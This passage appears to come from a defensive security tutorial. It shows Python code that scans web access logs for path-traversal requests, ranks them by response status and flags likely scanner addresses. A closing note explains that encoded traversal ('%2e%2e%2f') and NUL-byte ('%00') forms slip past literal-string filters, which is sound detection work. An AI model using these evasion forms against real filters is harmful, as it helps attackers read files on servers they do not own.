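def analyze(log_text):
    """Parse log lines; return (findings, requests_per_ip) for suspicious ones."""
    findings = []
    per_ip = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                        # skip lines that are not combined format
        indicators = classify(m.group("path"))
        if not indicators:
            continue
        status = int(m.group("status"))
        findings.append({
            "ip": m.group("ip"),
            "path": m.group("path"),
            "status": status,
            "indicators": indicators,
            # A 2xx answer to a traversal request is what the scanner hopes for,
            # so it is the finding that needs a human look first.
            "severity": "high" if 200 <= status < 300 else "medium",
        })
        per_ip[m.group("ip")] += 1
    return findings, per_ip


def scanners(per_ip, threshold=3):
    """Source addresses with at least `threshold` traversal requests (assumed cut-off)."""
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)


if __name__ == "__main__":
    found, counts = analyze(SAMPLE_LOG)
    for f in found:
        print(f"[{f['severity']:6}] {f['ip']} {f['status']} {f['path']} {f['indicators']}")
    print("probable scanners:", scanners(counts))
```

The decoded match matters: a WAF or log rule that looks for the literal string `../` misses the `%2e%2e%2f` form in the last sample line, and a rule that only looks at the raw path misses it too. The `%00` indicator is worth alerting on by itself: it only achieves anything against old interpreters that truncate file names at a NUL byte, so its presence says the sender is running a generic wordlist rather than anything tailored to the target.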